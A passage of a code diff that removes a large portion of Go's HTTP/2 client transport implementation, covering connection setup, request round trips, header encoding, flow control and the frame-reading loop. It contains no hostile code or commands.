initialWindowSize: 65535, // spec default - maxConcurrentStreams: 1000, // "infinite", per spec. 1000 seems good enough. - streams: make(map[uint32]*clientStream), - singleUse: singleUse, - wantSettingsAck: true, - pings: make(map[[8]byte]chan struct{}), - } - if d := t.idleConnTimeout(); d != 0 { - cc.idleTimeout = d - cc.idleTimer = time.AfterFunc(d, cc.onIdleTimeout) - } - if VerboseLogs { - t.vlogf("http2: Transport creating client conn %p to %v", cc, c.RemoteAddr()) - } - - cc.cond = sync.NewCond(&cc.mu) - cc.flow.add(int32(initialWindowSize)) - - // TODO: adjust this writer size to account for frame size + - // MTU + crypto/tls record padding. 
- cc.bw = bufio.NewWriter(stickyErrWriter{c, &cc.werr}) - cc.br = bufio.NewReader(c) - cc.fr = NewFramer(cc.bw, cc.br) - cc.fr.ReadMetaHeaders = hpack.NewDecoder(initialHeaderTableSize, nil) - cc.fr.MaxHeaderListSize = t.maxHeaderListSize() - - // TODO: SetMaxDynamicTableSize, SetMaxDynamicTableSizeLimit on - // henc in response to SETTINGS frames? - cc.henc = hpack.NewEncoder(&cc.hbuf) - - if cs, ok := c.(connectionStater); ok { - state := cs.ConnectionState() - cc.tlsState = &state - } - - initialSettings := []Setting{ - {ID: SettingEnablePush, Val: 0}, - {ID: SettingInitialWindowSize, Val: transportDefaultStreamFlow}, - } - if max := t.maxHeaderListSize(); max != 0 { - initialSettings = append(initialSettings, Setting{ID: SettingMaxHeaderListSize, Val: max}) - } - - cc.bw.Write(clientPreface) - cc.fr.WriteSettings(initialSettings...) - cc.fr.WriteWindowUpdate(0, transportDefaultConnFlow) - cc.inflow.add(transportDefaultConnFlow + initialWindowSize) - cc.bw.Flush() - if cc.werr != nil { - return nil, cc.werr - } - - go cc.readLoop() - return cc, nil -} - -func (cc *ClientConn) setGoAway(f *GoAwayFrame) { - cc.mu.Lock() - defer cc.mu.Unlock() - - old := cc.goAway - cc.goAway = f - - // Merge the previous and current GoAway error frames. - if cc.goAwayDebug == "" { - cc.goAwayDebug = string(f.DebugData()) - } - if old != nil && old.ErrCode != ErrCodeNo { - cc.goAway.ErrCode = old.ErrCode - } - last := f.LastStreamID - for streamID, cs := range cc.streams { - if streamID > last { - select { - case cs.resc <- resAndError{err: errClientConnGotGoAway}: - default: - } - } - } -} - -func (cc *ClientConn) CanTakeNewRequest() bool { - cc.mu.Lock() - defer cc.mu.Unlock() - return cc.canTakeNewRequestLocked() -} - -func (cc *ClientConn) canTakeNewRequestLocked() bool { - if cc.singleUse && cc.nextStreamID > 1 { - return false - } - return cc.goAway == nil && !cc.closed && - int64(len(cc.streams)+1) < int64(cc.maxConcurrentStreams) && - cc.nextStreamID < math.MaxInt32 -} - -// onIdleTimeout is called from a time.AfterFunc goroutine. It will -// only be called when we're idle, but because we're coming from a new -// goroutine, there could be a new request coming in at the same time, -// so this simply calls the synchronized closeIfIdle to shut down this -// connection. The timer could just call closeIfIdle, but this is more -// clear. -func (cc *ClientConn) onIdleTimeout() { - cc.closeIfIdle() -} - -func (cc *ClientConn) closeIfIdle() { - cc.mu.Lock() - if len(cc.streams) > 0 { - cc.mu.Unlock() - return - } - cc.closed = true - nextID := cc.nextStreamID - // TODO: do clients send GOAWAY too? maybe? Just Close: - cc.mu.Unlock() - - if VerboseLogs { - cc.vlogf("http2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)", cc, cc.singleUse, nextID-2) - } - cc.tconn.Close() -} - -const maxAllocFrameSize = 512 << 10 - -// frameBuffer returns a scratch buffer suitable for writing DATA frames. -// They're capped at the min of the peer's max frame size or 512KB -// (kinda arbitrarily), but definitely capped so we don't allocate 4GB -// bufers. 
-func (cc *ClientConn) frameScratchBuffer() []byte { - cc.mu.Lock() - size := cc.maxFrameSize - if size > maxAllocFrameSize { - size = maxAllocFrameSize - } - for i, buf := range cc.freeBuf { - if len(buf) >= int(size) { - cc.freeBuf[i] = nil - cc.mu.Unlock() - return buf[:size] - } - } - cc.mu.Unlock() - return make([]byte, size) -} - -func (cc *ClientConn) putFrameScratchBuffer(buf []byte) { - cc.mu.Lock() - defer cc.mu.Unlock() - const maxBufs = 4 // arbitrary; 4 concurrent requests per conn? investigate. - if len(cc.freeBuf) < maxBufs { - cc.freeBuf = append(cc.freeBuf, buf) - return - } - for i, old := range cc.freeBuf { - if old == nil { - cc.freeBuf[i] = buf - return - } - } - // forget about it. -} - -// errRequestCanceled is a copy of net/http's errRequestCanceled because it's not -// exported. At least they'll be DeepEqual for h1-vs-h2 comparisons tests. -var errRequestCanceled = errors.New("net/http: request canceled") - -func commaSeparatedTrailers(req *http.Request) (string, error) { - keys := make([]string, 0, len(req.Trailer)) - for k := range req.Trailer { - k = http.CanonicalHeaderKey(k) - switch k { - case "Transfer-Encoding", "Trailer", "Content-Length": - return "", &badStringError{"invalid Trailer key", k} - } - keys = append(keys, k) - } - if len(keys) > 0 { - sort.Strings(keys) - return strings.Join(keys, ","), nil - } - return "", nil -} - -func (cc *ClientConn) responseHeaderTimeout() time.Duration { - if cc.t.t1 != nil { - return cc.t.t1.ResponseHeaderTimeout - } - // No way to do this (yet?) with just an http2.Transport. Probably - // no need. Request.Cancel this is the new way. We only need to support - // this for compatibility with the old http.Transport fields when - // we're doing transparent http2. - return 0 -} - -// checkConnHeaders checks whether req has any invalid connection-level headers. -// per RFC 7540 section 8.1.2.2: Connection-Specific Header Fields. -// Certain headers are special-cased as okay but not transmitted later. -func checkConnHeaders(req *http.Request) error { - if v := req.Header.Get("Upgrade"); v != "" { - return fmt.Errorf("http2: invalid Upgrade request header: %q", req.Header["Upgrade"]) - } - if vv := req.Header["Transfer-Encoding"]; len(vv) > 0 && (len(vv) > 1 || vv[0] != "" && vv[0] != "chunked") { - return fmt.Errorf("http2: invalid Transfer-Encoding request header: %q", vv) - } - if vv := req.Header["Connection"]; len(vv) > 0 && (len(vv) > 1 || vv[0] != "" && vv[0] != "close" && vv[0] != "keep-alive") { - return fmt.Errorf("http2: invalid Connection request header: %q", vv) - } - return nil -} - -// actualContentLength returns a sanitized version of -// req.ContentLength, where 0 actually means zero (not unknown) and -1 -// means unknown. 
-func actualContentLength(req *http.Request) int64 { - if req.Body == nil || reqBodyIsNoBody(req.Body) { - return 0 - } - if req.ContentLength != 0 { - return req.ContentLength - } - return -1 -} - -func (cc *ClientConn) RoundTrip(req *http.Request) (*http.Response, error) { - if err := checkConnHeaders(req); err != nil { - return nil, err - } - if cc.idleTimer != nil { - cc.idleTimer.Stop() - } - - trailers, err := commaSeparatedTrailers(req) - if err != nil { - return nil, err - } - hasTrailers := trailers != "" - - cc.mu.Lock() - cc.lastActive = time.Now() - if cc.closed || !cc.canTakeNewRequestLocked() { - cc.mu.Unlock() - return nil, errClientConnUnusable - } - - body := req.Body - contentLen := actualContentLength(req) - hasBody := contentLen != 0 - - // TODO(bradfitz): this is a copy of the logic in net/http. Unify somewhere? - var requestedGzip bool - if !cc.t.disableCompression() && - req.Header.Get("Accept-Encoding") == "" && - req.Header.Get("Range") == "" && - req.Method != "HEAD" { - // Request gzip only, not deflate. Deflate is ambiguous and - // not as universally supported anyway. - // See: http://www.gzip.org/zlib/zlib_faq.html#faq38 - // - // Note that we don't request this for HEAD requests, - // due to a bug in nginx: - // http://trac.nginx.org/nginx/ticket/358 - // https://golang.org/issue/5522 - // - // We don't request gzip if the request is for a range, since - // auto-decoding a portion of a gzipped document will just fail - // anyway. See https://golang.org/issue/8923 - requestedGzip = true - } - - // we send: HEADERS{1}, CONTINUATION{0,} + DATA{0,} (DATA is - // sent by writeRequestBody below, along with any Trailers, - // again in form HEADERS{1}, CONTINUATION{0,}) - hdrs, err := cc.encodeHeaders(req, requestedGzip, trailers, contentLen) - if err != nil { - cc.mu.Unlock() - return nil, err - } - - cs := cc.newStream() - cs.req = req - cs.trace = requestTrace(req) - cs.requestedGzip = requestedGzip - bodyWriter := cc.t.getBodyWriterState(cs, body) - cs.on100 = bodyWriter.on100 - - cc.wmu.Lock() - endStream := !hasBody && !hasTrailers - werr := cc.writeHeaders(cs.ID, endStream, hdrs) - cc.wmu.Unlock() - traceWroteHeaders(cs.trace) - cc.mu.Unlock() - - if werr != nil { - if hasBody { - req.Body.Close() // per RoundTripper contract - bodyWriter.cancel() - } - cc.forgetStreamID(cs.ID) - // Don't bother sending a RST_STREAM (our write already failed; - // no need to keep writing) - traceWroteRequest(cs.trace, werr) - return nil, werr - } - - var respHeaderTimer <-chan time.Time - if hasBody { - bodyWriter.scheduleBodyWrite() - } else { - traceWroteRequest(cs.trace, nil) - if d := cc.responseHeaderTimeout(); d != 0 { - timer := time.NewTimer(d) - defer timer.Stop() - respHeaderTimer = timer.C - } - } - - readLoopResCh := cs.resc - bodyWritten := false - ctx := reqContext(req) - - handleReadLoopResponse := func(re resAndError) (*http.Response, error) { - res := re.res - if re.err != nil || res.StatusCode > 299 { - // On error or status code 3xx, 4xx, 5xx, etc abort any - // ongoing write, assuming that the server doesn't care - // about our request body. If the server replied with 1xx or - // 2xx, however, then assume the server DOES potentially - // want our body (e.g. full-duplex streaming: - // golang.org/issue/13444). If it turns out the server - // doesn't, they'll RST_STREAM us soon enough. This is a - // heuristic to avoid adding knobs to Transport. Hopefully - // we can keep it. 
- bodyWriter.cancel() - cs.abortRequestBodyWrite(errStopReqBodyWrite) - } - if re.err != nil { - if re.err == errClientConnGotGoAway { - cc.mu.Lock() - if cs.startedWrite { - re.err = errClientConnGotGoAwayAfterSomeReqBody - } - cc.mu.Unlock() - } - cc.forgetStreamID(cs.ID) - return nil, re.err - } - res.Request = req - res.TLS = cc.tlsState - return res, nil - } - - for { - select { - case re := <-readLoopResCh: - return handleReadLoopResponse(re) - case <-respHeaderTimer: - cc.forgetStreamID(cs.ID) - if !hasBody || bodyWritten { - cc.writeStreamReset(cs.ID, ErrCodeCancel, nil) - } else { - bodyWriter.cancel() - cs.abortRequestBodyWrite(errStopReqBodyWriteAndCancel) - } - return nil, errTimeout - case <-ctx.Done(): - cc.forgetStreamID(cs.ID) - if !hasBody || bodyWritten { - cc.writeStreamReset(cs.ID, ErrCodeCancel, nil) - } else { - bodyWriter.cancel() - cs.abortRequestBodyWrite(errStopReqBodyWriteAndCancel) - } - return nil, ctx.Err() - case <-req.Cancel: - cc.forgetStreamID(cs.ID) - if !hasBody || bodyWritten { - cc.writeStreamReset(cs.ID, ErrCodeCancel, nil) - } else { - bodyWriter.cancel() - cs.abortRequestBodyWrite(errStopReqBodyWriteAndCancel) - } - return nil, errRequestCanceled - case <-cs.peerReset: - // processResetStream already removed the - // stream from the streams map; no need for - // forgetStreamID. - return nil, cs.resetErr - case err := <-bodyWriter.resc: - // Prefer the read loop's response, if available. Issue 16102. - select { - case re := <-readLoopResCh: - return handleReadLoopResponse(re) - default: - } - if err != nil { - return nil, err - } - bodyWritten = true - if d := cc.responseHeaderTimeout(); d != 0 { - timer := time.NewTimer(d) - defer timer.Stop() - respHeaderTimer = timer.C - } - } - } -} - -// requires cc.wmu be held -func (cc *ClientConn) writeHeaders(streamID uint32, endStream bool, hdrs []byte) error { - first := true // first frame written (HEADERS is first, then CONTINUATION) - frameSize := int(cc.maxFrameSize) - for len(hdrs) > 0 && cc.werr == nil { - chunk := hdrs - if len(chunk) > frameSize { - chunk = chunk[:frameSize] - } - hdrs = hdrs[len(chunk):] - endHeaders := len(hdrs) == 0 - if first { - cc.fr.WriteHeaders(HeadersFrameParam{ - StreamID: streamID, - BlockFragment: chunk, - EndStream: endStream, - EndHeaders: endHeaders, - }) - first = false - } else { - cc.fr.WriteContinuation(streamID, endHeaders, chunk) - } - } - // TODO(bradfitz): this Flush could potentially block (as - // could the WriteHeaders call(s) above), which means they - // wouldn't respond to Request.Cancel being readable. That's - // rare, but this should probably be in a goroutine. - cc.bw.Flush() - return cc.werr -} - -// internal error values; they don't escape to callers -var ( - // abort request body write; don't send cancel - errStopReqBodyWrite = errors.New("http2: aborting request body write") - - // abort request body write, but send stream reset of cancel. 
- errStopReqBodyWriteAndCancel = errors.New("http2: canceling request") -) - -func (cs *clientStream) writeRequestBody(body io.Reader, bodyCloser io.Closer) (err error) { - cc := cs.cc - sentEnd := false // whether we sent the final DATA frame w/ END_STREAM - buf := cc.frameScratchBuffer() - defer cc.putFrameScratchBuffer(buf) - - defer func() { - traceWroteRequest(cs.trace, err) - // TODO: write h12Compare test showing whether - // Request.Body is closed by the Transport, - // and in multiple cases: server replies <=299 and >299 - // while still writing request body - cerr := bodyCloser.Close() - if err == nil { - err = cerr - } - }() - - req := cs.req - hasTrailers := req.Trailer != nil - - var sawEOF bool - for !sawEOF { - n, err := body.Read(buf) - if err == io.EOF { - sawEOF = true - err = nil - } else if err != nil { - return err - } - - remain := buf[:n] - for len(remain) > 0 && err == nil { - var allowed int32 - allowed, err = cs.awaitFlowControl(len(remain)) - switch { - case err == errStopReqBodyWrite: - return err - case err == errStopReqBodyWriteAndCancel: - cc.writeStreamReset(cs.ID, ErrCodeCancel, nil) - return err - case err != nil: - return err - } - cc.wmu.Lock() - data := remain[:allowed] - remain = remain[allowed:] - sentEnd = sawEOF && len(remain) == 0 && !hasTrailers - err = cc.fr.WriteData(cs.ID, sentEnd, data) - if err == nil { - // TODO(bradfitz): this flush is for latency, not bandwidth. - // Most requests won't need this. Make this opt-in or - // opt-out? Use some heuristic on the body type? Nagel-like - // timers? Based on 'n'? Only last chunk of this for loop, - // unless flow control tokens are low? For now, always. - // If we change this, see comment below. - err = cc.bw.Flush() - } - cc.wmu.Unlock() - } - if err != nil { - return err - } - } - - if sentEnd { - // Already sent END_STREAM (which implies we have no - // trailers) and flushed, because currently all - // WriteData frames above get a flush. So we're done. - return nil - } - - var trls []byte - if hasTrailers { - cc.mu.Lock() - defer cc.mu.Unlock() - trls = cc.encodeTrailers(req) - } - - cc.wmu.Lock() - defer cc.wmu.Unlock() - - // Two ways to send END_STREAM: either with trailers, or - // with an empty DATA frame. - if len(trls) > 0 { - err = cc.writeHeaders(cs.ID, true, trls) - } else { - err = cc.fr.WriteData(cs.ID, true, nil) - } - if ferr := cc.bw.Flush(); ferr != nil && err == nil { - err = ferr - } - return err -} - -// awaitFlowControl waits for [1, min(maxBytes, cc.cs.maxFrameSize)] flow -// control tokens from the server. -// It returns either the non-zero number of tokens taken or an error -// if the stream is dead. -func (cs *clientStream) awaitFlowControl(maxBytes int) (taken int32, err error) { - cc := cs.cc - cc.mu.Lock() - defer cc.mu.Unlock() - for { - if cc.closed { - return 0, errClientConnClosed - } - if cs.stopReqBody != nil { - return 0, cs.stopReqBody - } - if err := cs.checkResetOrDone(); err != nil { - return 0, err - } - if a := cs.flow.available(); a > 0 { - take := a - if int(take) > maxBytes { - - take = int32(maxBytes) // can't truncate int; take is int32 - } - if take > int32(cc.maxFrameSize) { - take = int32(cc.maxFrameSize) - } - cs.flow.take(take) - return take, nil - } - cc.cond.Wait() - } -} - -type badStringError struct { - what string - str string -} - -func (e *badStringError) Error() string { return fmt.Sprintf("%s %q", e.what, e.str) } - -// requires cc.mu be held. 
-func (cc *ClientConn) encodeHeaders(req *http.Request, addGzipHeader bool, trailers string, contentLength int64) ([]byte, error) { - cc.hbuf.Reset() - - host := req.Host - if host == "" { - host = req.URL.Host - } - host, err := httplex.PunycodeHostPort(host) - if err != nil { - return nil, err - } - - var path string - if req.Method != "CONNECT" { - path = req.URL.RequestURI() - if !validPseudoPath(path) { - orig := path - path = strings.TrimPrefix(path, req.URL.Scheme+"://"+host) - if !validPseudoPath(path) { - if req.URL.Opaque != "" { - return nil, fmt.Errorf("invalid request :path %q from URL.Opaque = %q", orig, req.URL.Opaque) - } else { - return nil, fmt.Errorf("invalid request :path %q", orig) - } - } - } - } - - // Check for any invalid headers and return an error before we - // potentially pollute our hpack state. (We want to be able to - // continue to reuse the hpack encoder for future requests) - for k, vv := range req.Header { - if !httplex.ValidHeaderFieldName(k) { - return nil, fmt.Errorf("invalid HTTP header name %q", k) - } - for _, v := range vv { - if !httplex.ValidHeaderFieldValue(v) { - return nil, fmt.Errorf("invalid HTTP header value %q for header %q", v, k) - } - } - } - - // 8.1.2.3 Request Pseudo-Header Fields - // The :path pseudo-header field includes the path and query parts of the - // target URI (the path-absolute production and optionally a '?' character - // followed by the query production (see Sections 3.3 and 3.4 of - // [RFC3986]). - cc.writeHeader(":authority", host) - cc.writeHeader(":method", req.Method) - if req.Method != "CONNECT" { - cc.writeHeader(":path", path) - cc.writeHeader(":scheme", req.URL.Scheme) - } - if trailers != "" { - cc.writeHeader("trailer", trailers) - } - - var didUA bool - for k, vv := range req.Header { - lowKey := strings.ToLower(k) - switch lowKey { - case "host", "content-length": - // Host is :authority, already sent. - // Content-Length is automatic, set below. - continue - case "connection", "proxy-connection", "transfer-encoding", "upgrade", "keep-alive": - // Per 8.1.2.2 Connection-Specific Header - // Fields, don't send connection-specific - // fields. We have already checked if any - // are error-worthy so just ignore the rest. - continue - case "user-agent": - // Match Go's http1 behavior: at most one - // User-Agent. If set to nil or empty string, - // then omit it. Otherwise if not mentioned, - // include the default (below). - didUA = true - if len(vv) < 1 { - continue - } - vv = vv[:1] - if vv[0] == "" { - continue - } - } - for _, v := range vv { - cc.writeHeader(lowKey, v) - } - } - if shouldSendReqContentLength(req.Method, contentLength) { - cc.writeHeader("content-length", strconv.FormatInt(contentLength, 10)) - } - if addGzipHeader { - cc.writeHeader("accept-encoding", "gzip") - } - if !didUA { - cc.writeHeader("user-agent", defaultUserAgent) - } - return cc.hbuf.Bytes(), nil -} - -// shouldSendReqContentLength reports whether the http2.Transport should send -// a "content-length" request header. This logic is basically a copy of the net/http -// transferWriter.shouldSendContentLength. -// The contentLength is the corrected contentLength (so 0 means actually 0, not unknown). -// -1 means unknown. -func shouldSendReqContentLength(method string, contentLength int64) bool { - if contentLength > 0 { - return true - } - if contentLength < 0 { - return false - } - // For zero bodies, whether we send a content-length depends on the method. - // It also kinda doesn't matter for http2 either way, with END_STREAM. 
- switch method { - case "POST", "PUT", "PATCH": - return true - default: - return false - } -} - -// requires cc.mu be held. -func (cc *ClientConn) encodeTrailers(req *http.Request) []byte { - cc.hbuf.Reset() - for k, vv := range req.Trailer { - // Transfer-Encoding, etc.. have already been filter at the - // start of RoundTrip - lowKey := strings.ToLower(k) - for _, v := range vv { - cc.writeHeader(lowKey, v) - } - } - return cc.hbuf.Bytes() -} - -func (cc *ClientConn) writeHeader(name, value string) { - if VerboseLogs { - log.Printf("http2: Transport encoding header %q = %q", name, value) - } - cc.henc.WriteField(hpack.HeaderField{Name: name, Value: value}) -} - -type resAndError struct { - res *http.Response - err error -} - -// requires cc.mu be held. -func (cc *ClientConn) newStream() *clientStream { - cs := &clientStream{ - cc: cc, - ID: cc.nextStreamID, - resc: make(chan resAndError, 1), - peerReset: make(chan struct{}), - done: make(chan struct{}), - } - cs.flow.add(int32(cc.initialWindowSize)) - cs.flow.setConnFlow(&cc.flow) - cs.inflow.add(transportDefaultStreamFlow) - cs.inflow.setConnFlow(&cc.inflow) - cc.nextStreamID += 2 - cc.streams[cs.ID] = cs - return cs -} - -func (cc *ClientConn) forgetStreamID(id uint32) { - cc.streamByID(id, true) -} - -func (cc *ClientConn) streamByID(id uint32, andRemove bool) *clientStream { - cc.mu.Lock() - defer cc.mu.Unlock() - cs := cc.streams[id] - if andRemove && cs != nil && !cc.closed { - cc.lastActive = time.Now() - delete(cc.streams, id) - if len(cc.streams) == 0 && cc.idleTimer != nil { - cc.idleTimer.Reset(cc.idleTimeout) - } - close(cs.done) - cc.cond.Broadcast() // wake up checkResetOrDone via clientStream.awaitFlowControl - } - return cs -} - -// clientConnReadLoop is the state owned by the clientConn's frame-reading readLoop. -type clientConnReadLoop struct { - cc *ClientConn - activeRes map[uint32]*clientStream // keyed by streamID - closeWhenIdle bool -} - -// readLoop runs in its own goroutine and reads and dispatches frames. -func (cc *ClientConn) readLoop() { - rl := &clientConnReadLoop{ - cc: cc, - activeRes: make(map[uint32]*clientStream), - } - - defer rl.cleanup() - cc.readerErr = rl.run() - if ce, ok := cc.readerErr.(ConnectionError); ok { - cc.wmu.Lock() - cc.fr.WriteGoAway(0, ErrCode(ce), nil) - cc.wmu.Unlock() - } -} - -// GoAwayError is returned by the Transport when the server closes the -// TCP connection after sending a GOAWAY frame. -type GoAwayError struct { - LastStreamID uint32 - ErrCode ErrCode - DebugData string -} - -func (e GoAwayError) Error() string { - return fmt.Sprintf("http2: server sent GOAWAY and closed the connection; LastStreamID=%v, ErrCode=%v, debug=%q", - e.LastStreamID, e.ErrCode, e.DebugData) -} - -func isEOFOrNetReadError(err error) bool { - if err == io.EOF { - return true - } - ne, ok := err.(*net.OpError) - return ok && ne.Op == "read" -} - -func (rl *clientConnReadLoop) cleanup() { - cc := rl.cc - defer cc.tconn.Close() - defer cc.t.connPool().MarkDead(cc) - defer close(cc.readerDone) - - if cc.idleTimer != nil { - cc.idleTimer.Stop() - } - - // Close any response bodies if the server closes prematurely. - // TODO: also do this if we've written the headers but not - // gotten a response yet. 
- err := cc.readerErr - cc.mu.Lock() - if cc.goAway != nil && isEOFOrNetReadError(err) { - err = GoAwayError{ - LastStreamID: cc.goAway.LastStreamID, - ErrCode: cc.goAway.ErrCode, - DebugData: cc.goAwayDebug, - } - } else if err == io.EOF { - err = io.ErrUnexpectedEOF - } - for _, cs := range rl.activeRes { - cs.bufPipe.CloseWithError(err) - } - for _, cs := range cc.streams { - select { - case cs.resc <- resAndError{err: err}: - default: - } - close(cs.done) - } - cc.closed = true - cc.cond.Broadcast() - cc.mu.Unlock() -} - -func (rl *clientConnReadLoop) run() error { - cc := rl.cc - rl.closeWhenIdle = cc.t.disableKeepAlives() || cc.singleUse - gotReply := false // ever saw a HEADERS reply - gotSettings := false - for { - f, err := cc.fr.ReadFrame() - if err != nil { - cc.vlogf("http2: Transport readFrame error on conn %p: (%T) %v", cc, err, err) - } - if se, ok := err.(StreamError); ok { - if cs := cc.streamByID(se.StreamID, true /*ended; remove it*/); cs != nil { - cs.cc.writeStreamReset(cs.ID, se.Code, err) - if se.Cause == nil { - se.Cause = cc.fr.errDetail - } - rl.endStreamError(cs, se) - } - continue - } else if err != nil { - return err - } - if VerboseLogs { - cc.vlogf("http2: Transport received %s", summarizeFrame(f)) - } - if !gotSettings { - if _, ok := f.(*SettingsFrame); !ok { - cc.logf("protocol error: received %T before a SETTINGS frame", f) - return ConnectionError(ErrCodeProtocol) - } - gotSettings = true - } - maybeIdle := false // whether frame might transition us to idle - - switch f := f.(type) { - case *MetaHeadersFrame: - err = rl.processHeaders(f) - maybeIdle = true - gotReply = true - case *DataFrame: - err = rl.processData(f) - maybeIdle = true - case *GoAwayFrame: - err = rl.processGoAway(f) - maybeIdle = true - case *RSTStreamFrame: - err = rl.processResetStream(f) - maybeIdle = true - case *SettingsFrame: - err = rl.processSettings(f) - case *PushPromiseFrame: - err = rl.processPushPromise(f) - case *WindowUpdateFrame: - err = rl.processWindowUpdate(f) - case *PingFrame: - err = rl.processPing(f) - default: - cc.logf("Transport: unhandled response frame type %T", f) - } - if err != nil { - if VerboseLogs { - cc.vlogf("http2: Transport conn %p received error from processing frame %v: %v", cc, summarizeFrame(f), err) - } - return err - } - if rl.closeWhenIdle && gotReply && maybeIdle && len(rl.activeRes) == 0 { - cc.closeIfIdle() - } - } -} - -func (rl *clientConnReadLoop) processHeaders(f *MetaHeadersFrame) error { - cc := rl.cc - cs := cc.streamByID(f.StreamID, f.StreamEnded()) - if cs == nil { - // We'd get here if we canceled a request while the - // server had its response still in flight. So if this - // was just something we canceled, ignore it. - return nil - } - if !cs.firstByte { - if cs.trace != nil { - // TODO(bradfitz): move first response byte earlier, - // when we first read the 9 byte header, not waiting - // until all the HEADERS+CONTINUATION frames have been - // merged. This works for now. - traceFirstResponseByte(cs.trace) - } - cs.firstByte = true - } - if !cs.pastHeaders { - cs.pastHeaders = true - } else { - return rl.processTrailers(cs, f) - } - - res, err := rl.handleResponse(cs, f) - if err != nil { - if _, ok := err.(ConnectionError); ok { - return err - } - // Any other error type is a stream error. - cs.cc.writeStreamReset(f.StreamID, ErrCodeProtocol, err) - cs.resc <- resAndError{err: err} - return nil // return nil from process* funcs to keep conn alive - } - if res == nil { - // (nil, nil) special case. See handleResponse docs. 
- return nil - } - if res.Body != noBody { - rl.activeRes[cs.ID] = cs - } - cs.resTrailer = &res.Trailer - cs.resc <- resAndError{res: res} - return nil -} - -// may return error types nil, or ConnectionError. Any other error value -// is a StreamError of type ErrCodeProtocol. The returned error in that case -// is the detail. -// -// As a special case, handleResponse may return (nil, nil) to skip the -// frame (currently only used for 100 expect continue). This special -// case is going away after Issue 13851 is fixed. -func (rl *clientConnReadLoop) handleResponse(cs *clientStream, f *MetaHeadersFrame) (*http.Response, error) { - if f.Truncated { - return nil, errResponseHeaderListSize - } - - status := f.PseudoValue("status") - if status == "" { - return nil, errors.New("missing status pseudo header") - } - statusCode, err := strconv.Atoi(status) - if err != nil { - return nil, errors.New("malformed non-numeric status pseudo header") - } - - if statusCode == 100 { - traceGot100Continue(cs.trace) - if cs.on100 != nil { - cs.on100() // forces any write delay timer to fire - } - cs.pastHeaders = false // do it all again - return nil, nil - } - - header := make(http.Header) - res := &http.Response{ - Proto: "HTTP/2.0", - ProtoMajor: 2, - Header: header, - StatusCode: statusCode, - Status: status + " " + http.StatusText(statusCode), - } - for _, hf := range f.RegularFields() { - key := http.CanonicalHeaderKey(hf.Name) - if key == "Trailer" { - t := res.Trailer - if t == nil { - t = make(http.Header) - res.Trailer = t - } - foreachHeaderElement(hf.Value, func(v string) { - t[http.CanonicalHeaderKey(v)] = nil - }) - } else { - header[key] = append(header[key], hf.Value) - } - } - - streamEnded := f.StreamEnded() - isHead := cs.req.Method == "HEAD" - if !streamEnded || isHead { - res.ContentLength = -1 - if clens := res.Header["Content-Length"]; len(clens) == 1 { - if clen64, err := strconv.ParseInt(clens[0], 10, 64); err == nil { - res.ContentLength = clen64 - } else { - // TODO: care? unlike http/1, it won't mess up our framing, so it's - // more safe smuggling-wise to ignore. - } - } else if len(clens) > 1 { - // TODO: care? unlike http/1, it won't mess up our framing, so it's - // more safe smuggling-wise to ignore. - } - } - - if streamEnded || isHead { - res.Body = noBody - return res, nil - } - - cs.bufPipe = pipe{b: &dataBuffer{expected: res.ContentLength}} - cs.bytesRemain = res.ContentLength - res.Body = transportResponseBody{cs} - go cs.awaitRequestCancel(cs.req) - - if cs.requestedGzip && res.Header.Get("Content-Encoding") == "gzip" { - res.Header.Del("Content-Encoding") - res.Header.Del("Content-Length") - res.ContentLength = -1 - res.Body = &gzipReader{body: res.Body} - setResponseUncompressed(res) - } - return res, nil -} - -func (rl *clientConnReadLoop) processTrailers(cs *clientStream, f *MetaHeadersFrame) error { - if cs.pastTrailers { - // Too many HEADERS frames for this stream. - return ConnectionError(ErrCodeProtocol) - } - cs.pastTrailers = true - if !f.StreamEnded() { - // We expect that any headers for trailers also - // has END_STREAM. - return ConnectionError(ErrCodeProtocol) - } - if len(f.PseudoFields()) > 0 { - // No pseudo header fields are defined for trailers. - // TODO: ConnectionError might be overly harsh? Check. 
- return ConnectionError(ErrCodeProtocol) - } - - trailer := make(http.Header) - for _, hf := range f.RegularFields() { - key := http.CanonicalHeaderKey(hf.Name) - trailer[key] = append(trailer[key], hf.Value) - } - cs.trailer = trailer - - rl.endStream(cs) - return nil -} - -// transportResponseBody is the concrete type of Transport.RoundTrip's -// Response.Body. It is an io.ReadCloser. On Read, it reads from cs.body. -// On Close it sends RST_STREAM if EOF wasn't already seen. -type transportResponseBody struct { - cs *clientStream -} - -func (b transportResponseBody) Read(p []byte) (n int, err error) { - cs := b.cs - cc := cs.cc - - if cs.readErr != nil { - return 0, cs.readErr - } - n, err = b.cs.bufPipe.Read(p) - if cs.bytesRemain != -1 { - if int64(n) > cs.bytesRemain { - n = int(cs.bytesRemain) - if err == nil { - err = errors.New("net/http: server replied with more than declared Content-Length; truncated") - cc.writeStreamReset(cs.ID, ErrCodeProtocol, err) - } - cs.readErr = err - return int(cs.bytesRemain), err - } - cs.bytesRemain -= int64(n) - if err == io.EOF && cs.bytesRemain > 0 { - err = io.ErrUnexpectedEOF - cs.readErr = err - return n, err - } - } - if n == 0 { - // No flow control tokens to send back. - return - } - - cc.mu.Lock() - defer cc.mu.Unlock() - - var connAdd, streamAdd int32 - // Check the conn-level first, before the stream-level. - if v := cc.inflow.available(); v < transportDefaultConnFlow/2 { - connAdd = transportDefaultConnFlow - v - cc.inflow.add(connAdd) - } - if err == nil { // No need to refresh if the stream is over or failed. - // Consider any buffered body data (read from the conn but not - // consumed by the client) when computing flow control for this - // stream. - v := int(cs.inflow.available()) + cs.bufPipe.Len() - if v < transportDefaultStreamFlow-transportDefaultStreamMinRefresh { - streamAdd = int32(transportDefaultStreamFlow - v) - cs.inflow.add(streamAdd) - } - } - if connAdd != 0 || streamAdd != 0 { - cc.wmu.Lock() - defer cc.wmu.Unlock() - if connAdd != 0 { - cc.fr.WriteWindowUpdate(0, mustUint31(connAdd)) - } - if streamAdd != 0 { - cc.fr.WriteWindowUpdate(cs.ID, mustUint31(streamAdd)) - } - cc.bw.Flush() - } - return -} - -var errClosedResponseBody = errors.New("http2: response body closed") - -func (b transportResponseBody) Close() error { - cs := b.cs - cc := cs.cc - - serverSentStreamEnd := cs.bufPipe.Err() == io.EOF - unread := cs.bufPipe.Len() - - if unread > 0 || !serverSentStreamEnd { - cc.mu.Lock() - cc.wmu.Lock() - if !serverSentStreamEnd { - cc.fr.WriteRSTStream(cs.ID, ErrCodeCancel) - cs.didReset = true - } - // Return connection-level flow control. - if unread > 0 { - cc.inflow.add(int32(unread)) - cc.fr.WriteWindowUpdate(0, uint32(unread)) - } - cc.bw.Flush() - cc.wmu.Unlock() - 